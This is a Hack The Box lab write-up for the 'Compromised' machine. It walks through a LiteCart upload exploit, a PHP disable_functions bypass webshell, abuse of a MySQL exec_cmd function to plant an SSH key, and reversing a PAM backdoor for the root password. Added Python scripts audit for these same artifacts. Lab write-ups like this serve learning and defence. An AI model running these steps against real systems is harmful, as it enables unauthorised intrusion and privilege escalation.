
Compromised Writeup [HTB]

Compromised is a Linux machine from Hack The Box rated as difficult. It consists of enumerating to find credentials for admin access; then, as many PHP functions are disabled, a PHP disable_functions bypass exploit is used to obtain a webshell. Next, looking for backdoors, a MySQL user-defined function can be used to obtain SSH access and then the sysadmin credentials. Finally, a PAM backdoor is found and, by reversing it, the root credentials are retrieved.

Enumeration

Running nmap:

```console
nmap -sC -sV compromised.htb
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
|   256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_  256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Browsing to port 80 we find the following page:

[Screenshot]

Running gobuster to enumerate web directories, we find a backup directory containing a copy of the page source:

```console
gobuster dir -u http://compromised.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/shop (Status: 301)
/backup (Status: 301)
/server-status (Status: 403)
```

Enumerating the backup of the site, I decided to grep inside the admin directory to see if there were any passwords:

```console
noxious@kali:~/Desktop/Vms/HTB/Compromised/shop/admin$ grep -ir "passwd" --color=always
login.php:    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
```
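The grep above is a manual version of a check a defender would automate after a suspected compromise: find any PHP statement that writes raw request parameters to a file or off-box sink. The script below is an added example written for this writeup, not code from the post or from LiteCart; the PHP source it scans is a constructed sample modelled on the commented-out logger found in admin/login.php. Note that it reports commented-out lines too, since on this box the line was disabled in the backup but the log file still existed on the live server.

```python
import re

# Constructed sample of PHP files, modelled on the credential logger found in
# the backup's admin/login.php. Paths and contents are made up for this example.
SAMPLE_PHP = {
    "admin/login.php": """<?php
    // harmless log line
    error_log("login attempt");
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    file_put_contents('/tmp/.x', $_POST['password']);
    """,
    "includes/functions.php": """<?php
    $data = file_get_contents('config.json');
    """,
}

# Sinks that persist or exfiltrate data; reading a request parameter into one of
# these on the same statement is the pattern of a credential-harvesting backdoor.
WRITE_SINKS = ("file_put_contents", "fwrite", "fputs", "error_log", "mail")
USER_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[")


def find_credential_sinks(files):
    """Return (path, line_no, sink, commented_out) for every line where a write
    sink and a raw request superglobal appear together. Commented-out hits are
    kept: they still show someone planted the code at some point."""
    findings = []
    for path, src in files.items():
        for no, line in enumerate(src.splitlines(), 1):
            for sink in WRITE_SINKS:
                if sink in line and USER_INPUT.search(line):
                    commented = line.lstrip().startswith(("//", "#", "*"))
                    findings.append((path, no, sink, commented))
                    break
    return findings


if __name__ == "__main__":
    for path, no, sink, commented in find_credential_sinks(SAMPLE_PHP):
        flag = " (commented out)" if commented else ""
        print(f"{path}:{no}: {sink} receives request input{flag}")
```

Run against a real webroot, a hit of this kind is grounds to diff the file against the vendor release and to look for the named log file (here a dotfile in the admin directory) on the live host.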

This log file stood out: it wasn't inside the backup of the site, but accessing it through the web server revealed the admin credentials:

[Screenshot]

Exploitation

After logging in as admin, I found that the site was running LiteCart 2.1.2, for which an arbitrary file upload exploit was available:

https://www.exploit-db.com/exploits/45267

Running the exploit:

```console
python litecart.py -t http://compromised.htb/shop/admin/ -u 'admin' -p 'theNextGenSt0r3!~'
Shell => http://compromised.htb/shop/admin/../vqmod/xml/GVYL1.php?c=id
```

But when I tried to use that webshell it didn't work, so I modified the exploit code to run phpinfo() instead, which showed that several PHP functions were disabled.

[Screenshot]

Most of the functions normally used to obtain a webshell were among them, so, knowing the PHP version, I searched for an exploit that bypasses disable_functions:

https://packetstormsecurity.com/files/154728/PHP-7.3-disable_functions-Bypass.html

Then we needed to modify the exploit code so that it runs the command passed in the c parameter, giving a webshell:

```php
pwn($_GET['c']);
```

Next, we used Burp Suite to upload the exploit at the following URL: http://compromised.htb/shop/admin/?app=vqmods&doc=vqmods

Modifying the Content-Type to XML was enough to bypass the filter and upload the file:

[Screenshot]

Finally, we can use webwrap to obtain an interactive webshell:

```console
rlwrap python3 webwrap.py http://compromised.htb/shop/vqmod/xml/sh.php?c=WRAP
www-data@compromised:/var/www/html/shop/vqmod/xml$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Now we need to enumerate the machine in order to find some information that can lead us to obtain user access.

First, reading /etc/passwd, I noticed that the mysql user had /bin/bash as its shell; given the machine's name, this might be a hint that the service has some kind of backdoor:

```console
www-data@compromised:/var/www/html/shop/vqmod/xml$ cat /etc/passwd
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
```

Afterwards, a config file containing database credentials was discovered:

```php
www-data@compromised:/var/www/html/shop/includes$ cat config.inc.php
// Database
  define('DB_TYPE', 'mysql');
  define('DB_SERVER', 'localhost');
  define('DB_USERNAME', 'root');
  define('DB_PASSWORD', 'changethis');
  define('DB_DATABASE', 'ecom');
  define('DB_TABLE_PREFIX', 'lc_');
  define('DB_CONNECTION_CHARSET', 'utf8');
  define('DB_PERSISTENT_CONNECTIONS', 'false');
```

Researching MySQL backdoors and exploits, I came across this [article](https://recipeforroot.com/mysql-to-system-root/), which pointed me where to look.

```console
www-data@compromised:/var/www/html/shop/includes$ mysql -u root --password=changethis -e "use mysql; select * from func"
mysql: [Warning] Using a password on the command line interface can be insecure.
name    ret     dl      type
exec_cmd        0       libmysql.so     function
```
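Two of the findings above, the mysql account with an interactive shell in /etc/passwd and the exec_cmd entry in mysql.func, are exactly the artifacts a host audit should flag. The following is an added example for this writeup, not code from the post: it takes rows in the shape of `SELECT * FROM mysql.func` plus a listing of plugin_dir, and a constructed /etc/passwd, and reports UDFs that are not on an approved list or look like command-execution helpers, and service accounts that can log in. The allowlist, the sha2_custom UDF and the plugin_dir contents are assumptions made up for the example; the exec_cmd row mirrors the box.

```python
import os

# Constructed rows in the shape of `SELECT name, ret, dl, type FROM mysql.func`.
# The exec_cmd row mirrors the box; sha2_custom is an invented legitimate UDF.
FUNC_ROWS = [
    {"name": "exec_cmd", "ret": 0, "dl": "libmysql.so", "type": "function"},
    {"name": "sha2_custom", "ret": 0, "dl": "mysql_hash.so", "type": "function"},
]
# Constructed listing of the server's plugin_dir (SHOW VARIABLES LIKE 'plugin_dir').
PLUGIN_DIR_FILES = {"libmysql.so", "mysql_hash.so", "auth_socket.so"}
# Assumed: UDFs the DBA deliberately installed. Anything else needs a reason to exist.
ALLOWED_UDFS = {"sha2_custom"}

# Constructed /etc/passwd excerpt; the mysql line matches the box.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
sysadmin:x:1000:1000:sysadmin:/home/sysadmin:/bin/bash
"""
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/usr/bin/nologin", "/bin/false"}


def audit_udfs(rows, plugin_files, allowed=ALLOWED_UDFS):
    """Return [(udf_name, [reasons])] for every registered UDF worth a look."""
    findings = []
    for row in rows:
        reasons = []
        name = row["name"].lower()
        if name not in allowed:
            reasons.append("not in the approved UDF allowlist")
        # Names of the common shell-out UDF families (sys_exec, sys_eval, ...).
        if "exec" in name or "eval" in name or name.startswith("sys_"):
            reasons.append("name suggests command execution")
        # A dangling entry still matters: the .so may have been removed to hide it.
        if os.path.basename(row["dl"]) not in plugin_files:
            reasons.append("shared object missing from plugin_dir")
        if reasons:
            findings.append((row["name"], reasons))
    return findings


def service_accounts_with_shells(passwd_text):
    """Return [(user, shell)] for system accounts (0 < uid < 1000) that can log in."""
    hits = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, _pw, uid, _gid, _gecos, _home, shell = line.split(":", 6)
        if 0 < int(uid) < 1000 and shell not in NOLOGIN_SHELLS:
            hits.append((user, shell))
    return hits


if __name__ == "__main__":
    for name, reasons in audit_udfs(FUNC_ROWS, PLUGIN_DIR_FILES):
        print(f"UDF {name}: " + "; ".join(reasons))
    for user, shell in service_accounts_with_shells(PASSWD_SAMPLE):
        print(f"service account {user} has login shell {shell}")
```

On a live server the remediation for a rogue entry is `DROP FUNCTION exec_cmd;` followed by removing the library from plugin_dir and rotating the root database password, which here was also sitting in config.inc.php readable by www-data.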

Then we could use this exec_cmd function to execute commands as the mysql user:

```console
mysql -u root --password=changethis -e "select exec_cmd('id')"
mysql: [Warning] Using a password on the command line interface can be insecure.
exec_cmd('id')
uid=111(mysql) gid=113(mysql) groups=113(mysql)
```

Next, since the SSH service was open, I wrote my public key into the mysql user's authorized_keys:

```console
mysql -u root --password=changethis -e "select exec_cmd('echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFuyPr4RFVPtUVBstN9/BoYQemup/I2VkSHV2lw8ul+d noxious@kali > ~/.ssh/authorized_keys')"
```

Then we can simply SSH in as the mysql user:

```console
ssh mysql@compromised.htb
mysql@compromised:~$ id
uid=111(mysql) gid=113(mysql) groups=113(mysql)
```

While enumerating files, strace-log.dat caught my attention; grepping it for passwords showed an interesting mysql invocation:

```console
mysql@compromised:~$ cat strace-log.dat | grep password
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */)
```

I then tried this password to switch to the sysadmin user, which worked:

```console
mysql@compromised:~$ su sysadmin
sysadmin@compromised:/var/lib/mysql$ id
uid=1000(sysadmin) gid=1000(sysadmin) groups=1000(sysadmin)
```

Privilege Escalation

After some time enumerating without finding anything useful, I decided to follow the machine's theme and look for backdoors. Searching for recently modified files, I came across the following output:

```console
sysadmin@compromised:/lib$ find . -mtime -24
.
./x86_64-linux-gnu/security
./x86_64-linux-gnu/security/.pam_unix.so
./x86_64-linux-gnu/security/pam_unix.so
./systemd/system
./udev
./udev/rules.d
./ifupdown
```
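The mtime search above works, but a modified pam_unix.so next to a hidden .pam_unix.so is also what a package integrity check catches directly: on Debian/Ubuntu every file shipped by libpam-modules has a recorded MD5 in /var/lib/dpkg/info/, so a module whose hash no longer matches, or a file in the security directory that no package claims, stands out. The script below is an added example for this writeup, not code from the post or from the linked backdoor project. It builds a throwaway directory tree with a trojaned pam_unix.so and a hidden copy of the original (constructed contents, not real PAM modules), parses a dpkg-style manifest, and reports both.

```python
import hashlib
import os
import tempfile


def load_md5sums(manifest_text):
    """Parse dpkg-style '<md5>  <path-without-leading-slash>' lines into {path: md5}."""
    expected = {}
    for line in manifest_text.splitlines():
        if line.strip():
            digest, path = line.split(None, 1)
            expected["/" + path.strip()] = digest
    return expected


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_dir(root, directory, expected):
    """Compare every regular file in `directory` (under filesystem `root`) with the
    manifest. Returns (modified, unlisted): files whose hash differs, and files no
    package knows about, such as a hidden copy left behind by a backdoor."""
    modified, unlisted = [], []
    for name in sorted(os.listdir(os.path.join(root, directory.lstrip("/")))):
        rel = os.path.join(directory, name)
        full = os.path.join(root, rel.lstrip("/"))
        if not os.path.isfile(full):
            continue
        if rel not in expected:
            unlisted.append(rel)
        elif md5_of(full) != expected[rel]:
            modified.append(rel)
    return modified, unlisted


def build_demo():
    """Constructed fixture: a fake root whose pam_unix.so was replaced and whose
    original was stashed as .pam_unix.so, plus a manifest for the original files."""
    root = tempfile.mkdtemp()
    secdir = os.path.join(root, "lib/x86_64-linux-gnu/security")
    os.makedirs(secdir)
    original = b"ORIGINAL pam_unix.so bytes (constructed)"
    with open(os.path.join(secdir, "pam_unix.so"), "wb") as f:
        f.write(b"TROJANED pam_unix.so bytes (constructed)")
    with open(os.path.join(secdir, ".pam_unix.so"), "wb") as f:
        f.write(original)
    with open(os.path.join(secdir, "pam_deny.so"), "wb") as f:
        f.write(b"pam_deny")
    manifest = (
        f"{hashlib.md5(original).hexdigest()}  lib/x86_64-linux-gnu/security/pam_unix.so\n"
        f"{hashlib.md5(b'pam_deny').hexdigest()}  lib/x86_64-linux-gnu/security/pam_deny.so\n"
    )
    return root, manifest


def run_demo():
    root, manifest = build_demo()
    return audit_dir(root, "/lib/x86_64-linux-gnu/security", load_md5sums(manifest))


if __name__ == "__main__":
    modified, unlisted = run_demo()
    print("modified:", modified)
    print("unlisted:", unlisted)
```

On a real host the same check is `dpkg --verify libpam-modules` (or debsums), with the caveat that an attacker who has root can also edit the stored md5sums, so compare against the package from the mirror rather than the local manifest when the box is in doubt.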

Searching for PAM backdoors, I found one on GitHub that produces exactly this file:

https://github.com/zephrax/linux-pam-backdoor

So I transferred the file to my machine using scp:

```console
scp sysadmin@compromised.htb:/lib/x86_64-linux-gnu/security/pam_unix.so Desktop/pam_unix.so
```

Once I had the file on my machine, I opened it in Ghidra to see whether I could find the password used.

Decompiling the functions, two hex constants inside pam_sm_authenticate were assigned to a variable named backdoor:

[Screenshot]

Converting these two values to little-endian byte order and concatenating them gives the following hex string:

```text
7a6c6b657e5533456e7638326d322d
```

Decoding it, we obtain the root password:

```console
echo "7a6c6b657e5533456e7638326d322d" | xxd -r -p
zlke~U3Env82m2-
```
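The byte-order step is the part of this analysis that is easy to get wrong by hand, so here it is as an added example (not from the post): a decompiler shows a string stored as immediates in their integer form, and on x86-64 each 64-bit immediate must be emitted little-endian and the NUL padding of the last word dropped. The post gives only the combined hex, so the two qword values below were constructed from the recovered string for the example; in Ghidra you would read them off the assignments to backdoor.

```python
# Constructed: the two 64-bit immediates a decompiler would display for a
# 15-byte string stored as two qwords. Derived here from the recovered string,
# since the post shows only the concatenated hex, not the individual constants.
BACKDOOR_QWORDS = [0x4533557E656B6C7A, 0x2D326D3238766E]


def immediates_to_bytes(values, width=8):
    """Emit each immediate in little-endian byte order (x86-64 memory layout),
    concatenate in program order, and strip the NUL padding of the final word.
    Use width=4 for 32-bit targets whose decompiler shows dword immediates."""
    raw = b"".join(v.to_bytes(width, "little") for v in values)
    return raw.rstrip(b"\x00")


def as_hex(values, width=8):
    """The hex string the post pastes into xxd, e.g. 7a6c6b65...322d."""
    return immediates_to_bytes(values, width).hex()


def decode_string(values, width=8):
    """The recovered ASCII string, equivalent to `xxd -r -p` on as_hex()."""
    return immediates_to_bytes(values, width).decode("ascii")


if __name__ == "__main__":
    print(as_hex(BACKDOOR_QWORDS))
    print(decode_string(BACKDOOR_QWORDS))
```

A quick sanity check when the result looks wrong: if the output is readable but reversed in 8-byte chunks, the immediates were emitted big-endian; if it is readable but the halves are swapped, the two assignments were read in the wrong order.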

Finally, we can switch to the root account:

```console
sysadmin@compromised:/lib$ su root
Password:
root@compromised:/lib# id
uid=0(root) gid=0(root) groups=0(root)
root@compromised:/lib# whoami
root
```

This post is licensed under CC BY 4.0 by the author.